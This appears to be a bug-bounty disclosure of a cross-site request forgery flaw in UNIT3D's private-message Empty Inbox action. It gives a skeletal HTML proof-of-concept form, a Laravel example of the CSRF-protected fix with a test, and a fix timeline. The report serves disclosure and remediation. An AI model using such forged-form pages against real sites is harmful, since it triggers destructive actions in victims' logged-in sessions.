Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition


Reported on Oct 9th 2021


There is a CSRF vulnerability in the Empty Inbox action of the Private Messages inbox: the state-changing request carries no anti-CSRF token, so a page on another origin can trigger it in a logged-in user's session.

Proof of Concept


```html
<script>history.pushState('', '', '/')</script>
<!-- the form's action target was left empty in the report -->
<form action="">
  <input type="submit" value="Submit request" />
</form>
```
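The defensive shape such an action should have in a Laravel/Blade application, as an added illustration that is not the project's own code and not the change made in commit 63ae97; the route, controller, view and relationship names are assumed:

```php
<?php
// Added example (not from the report or the UNIT3D repository): the shape
// of a CSRF-safe "empty inbox" action in a Laravel/Blade app. The route,
// controller, view and relationship names are assumed for illustration.
use App\Http\Controllers\Controller;
use App\Models\User;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\Route;
use Tests\TestCase;

// routes/web.php: the action answers only to DELETE, never GET, so a link,
// <img src> or redirect cannot trigger it. Routes in the "web" group also
// pass through VerifyCsrfToken, which rejects unsafe-method requests that
// lack a valid session token with HTTP 419.
Route::delete('/messages/inbox', [PrivateMessageController::class, 'emptyInbox'])
    ->middleware('auth')
    ->name('inbox.empty');

// resources/views/user/inbox.blade.php: the form carries the session token
// (@csrf) and the spoofed verb (@method). A page on another origin cannot
// read the token, so a forged request like the PoC above fails the check.
/*
<form method="POST" action="{{ route('inbox.empty') }}">
    @csrf
    @method('DELETE')
    <button type="submit">Empty inbox</button>
</form>
*/

// app/Http/Controllers/PrivateMessageController.php
class PrivateMessageController extends Controller
{
    public function emptyInbox(Request $request)
    {
        // Delete only the caller's own messages; the target user comes from
        // the authenticated session, never from request input.
        $request->user()->receivedMessages()->delete();
        return redirect()->route('inbox.index')->with('success', 'Inbox emptied.');
    }
}

// tests/Feature/InboxCsrfTest.php: pin the method restriction in a test.
class InboxCsrfTest extends TestCase
{
    public function test_get_request_cannot_empty_inbox(): void
    {
        $this->actingAs(User::factory()->create())
            ->get('/messages/inbox')
            ->assertStatus(405); // Method Not Allowed: GET never reaches the handler
    }
}
```

Laravel skips CSRF token verification in the testing environment, so the test pins the verb restriction rather than the 419 response; verify the token check itself against a running instance.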
Timeline

- A member of the hdinnovations/unit3d-community-edition team was contacted and asked to respond.
- HDVinnie validated this vulnerability.
- amammad was awarded the disclosure bounty.
- HDVinnie marked this as fixed with commit 63ae97 and was awarded the fix bounty.
- This vulnerability will not receive a CVE.
- inbox.blade.php#L39 has been validated.


Hey maintainer,

Can I ask you to increase the bounty, please?
